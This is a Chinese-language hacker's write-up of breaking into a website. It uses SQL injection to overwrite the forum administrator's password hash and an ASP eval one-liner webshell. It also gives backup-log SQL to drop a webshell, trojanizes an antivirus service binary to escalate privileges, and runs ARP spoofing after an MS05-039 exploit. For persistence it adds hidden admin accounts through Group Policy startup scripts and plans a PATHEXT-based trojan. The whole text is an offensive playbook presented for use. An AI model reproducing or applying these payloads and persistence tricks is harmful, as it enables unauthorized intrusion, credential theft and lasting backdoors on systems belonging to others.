这一篇文章纯属个人入侵的总结,并没有什么高深之处,第一次写文章,难免有一些错误或者你有什么新思路,请不吝指教!
在百度上搜索ckl inurl:asp,搜索出来的,只要是MSSQL数据库的就一定是db_owner权限以上,起码我还没看到过
public的,db_owner可是对当前连接的数据库拥有一切操作权利,可以执行select,update,delete.create.drop等命令.
在搜索出来的资料,找到一个china级的网站,是db_owner权限,浏览一下网站,发现上面上了一个动网7.1论坛,通过
whois.webhosting.info查询,发现还挂有一个网站,应当是个人主机,通过telnet target 80发现iis5.0的,windows2000的吧!
1,得到webshell
有两个思路.第一个是从网站着手
首先从暴表开始,找了一下发现user这个表示存放的动网的用户表,再暴这个表的字段,顺利找出管理员的用户名和密码,密码是md5加密,到www.xmd5.org是解一下,发现管理员还是有一些安全意识的,不是弱口令.那我们是
db_owner权限,可以update,还害怕什么!直接在注入点www.target.com/list.id=1‘;update [user] set password=’49ba59abbe56e057′ where id=1– 其中49ba59abbe56e057是123456的md5加密,现在就把前台管理员的密码改成123456了,又同样方法把后台管理员的密码也改成123456,顺利登陆.好,现在可以利用备份数据库的方法,得到webshell
大家都知道动网7.1不能象以前的老方法进行备份,得到webshell了,备份时会检查是不是mdb文件,如果不是就会出错!可是我们也有对策,建一个表,在字段里插入try{eval(Request.form(’#’)+’’)}catch(e){}冰狐浪子的小马,然后把表改成1.gif(也可以在利用copy的命令)在前台上传后,记下地址,在后台直接备份成a.asp成功,用冰狐的客户端连接成功,再上传一个比较少见的大马.
第二个是思路
直接进行差异备份,这里用到的方法是 swan 最近刚公布的backup log
alter database XXXX set RECOVERY FULL
backup log XXXX to disk = ‘c:\Sammy’ with init
create table cmd (a image)
insert into cmd (a) values (’’)
backup log XXXX to disk = ‘c:\xxx\2.asp’
其中XXXX 是数据库 的多了一个%,是为了容错
应用此法顺利得到一个webshell
那现在当然是找提升权限的漏洞了,考虑的当然serv-u和pcanywhere,在系统服务列表里看到了pcanywhere的痕迹,在地址栏输入C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\ 顺利得到一个.cif文件,用pcanywhere passview得到用户名跟密码,用pcanywhere登陆发现要求只能administrators组才能登陆,那好现在的思路就是找个自启动的服务程序,在系统服务列表里找到了一个瑞星,路径D:\PROGRAM FILES\RISING\RAV下载rising.exe下来后,再捆绑了一个加用户的vbs,再把目标的rising.exe改一下名,再把捆绑好的rising.exe上传上去.就等待服务器的重启了.我可是很有耐心的.提权的方法是多种多样的,自己看着办吧
2.外网的安全
最近看了很多篇的ARP欺骗文章,所以就试验一下.首先ping www.target.com得到IP1.1.1.2,通过portready扫描1.1.1.0-1.1.1.255,通过以前很流行的ms05039,顺利得到一个机子1.1.1.3,并开了3389,进去后直接下载winpcap驱动(嗅探器依赖的驱动),再下载一个arpspoof(嗅探器),然后tracert 发现网关是1.1.1.1.我自己讲一下ARP欺骗的原理,ARP就是地址解析协议,是OSI的网络层(IP层)转为数据链路层(MAC)的协议,在LAN中通信并不是以IP作为地址,而是物理地址,也就是MAC.那我们变可以进行邪恶的欺骗行为,比如有3台主机,A.B.C,A是你的机子,B是你想欺骗
的主机,C是网关,那我们可以发送一个ARP应答给C,说我是B,给C我的MAC地址,再欺骗B,我是网关,并给他我的MAC
地址,他们就会误会,并把所有给B的数据都流向给A.应此A的CPU也就会负荷,可能导致死机.
个人认为防护方法,主动的方法是把MAC和IP固态绑定
ARPSPOOF就是这样的工具.命令格式ArpSpoof [Spoof IP1] [Spoof IP2] [Own IP]
在1.1.1.3上运行arpspoof 1.1.1.1 1.1.12 1.1.1.3 21 c:\log.txt
现在就是等待管理员的登陆了
3.固守肉鸡
辛苦得到了肉鸡当然要好好保护了,我们可以利用文件夹的创建漏洞,比如有一个文件夹A 那么我们在cmd下,转
到当前路径,输入mkdir a..\这样就创建了一个文件夹a..\,而当打开这个文件的时候却指向A文件夹,那么我们可以防一个ASP木马在里面,再使用netbox指向这个文件,这个ASP木马就是SYSTEM的权限了.当我们访问www.target.com/a..\/asp木马 这样就可以了.同样的我们也可以利用IIS5.0的漏洞,创建一个虚绿目录A,在这个虚绿目录中又在创建一个虚绿目录B,并指定文件地址,并把IIS的保护挑低,再把我们的第一个虚绿目录A删掉,这样我们访问的时候,www.target.com/a/b/asp木马.同样也拥有SYSTEM的权限.那我们为了以防万一,可以利用此法
net user jouanc$ 123456 /add
net localgroup administrators jouanc$ /add保存为1.vbs,并放在C:\winnt\system32\GroupPolicy\Machine\Scripts\Startup \该目录
net user jouanc$ /del保存为2.vbs,并放在C:\winnt\system32\GroupPolicy\Machine\Scripts\Shutdown\
将以下保存为script.ini,并放在C:\winnt\system32\GroupPolicy\Machine\Scripts
[Startup]
0CmdLine=1.vbs
0Parameters=
[Shutdown]
0CmdLine=2.vbs
0Parameters=
我还有一个想法,就是建个”从网上下载东东的vbs”相当与downloader,从我们自己的空间下载我们配置好的后门
然后用个bat,利用if来判断是否把我们的后门下载下来,然后再goto运行它,把这两个绑好后,放在startup里.
在shutdown里,放一个del “我们的木马”的bat,前提ie可以打开,我进过一些肉鸡,要打开ie,必须设置的.
还有一招,大家在cmd下输入set
其中有两行
Path=D:\WINNT\system32;D:\WINNT;D:\WINNT\System32\Wbem
PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH
知道吧,.com最有优先权,那我们可以放一个www.google.com,注意”www.google.com”是我们的木马,我们把它放在
D:\WINNT\system32,哈哈,当肉鸡打开ie,输入www.google.com的话,ie只会先找我们的木马
除非他输入的是”http://www.google.com”
其实保护肉鸡的方法有很多,我很喜欢这种保护肉鸡的方法,不会被杀,又能抓牢肉鸡 |
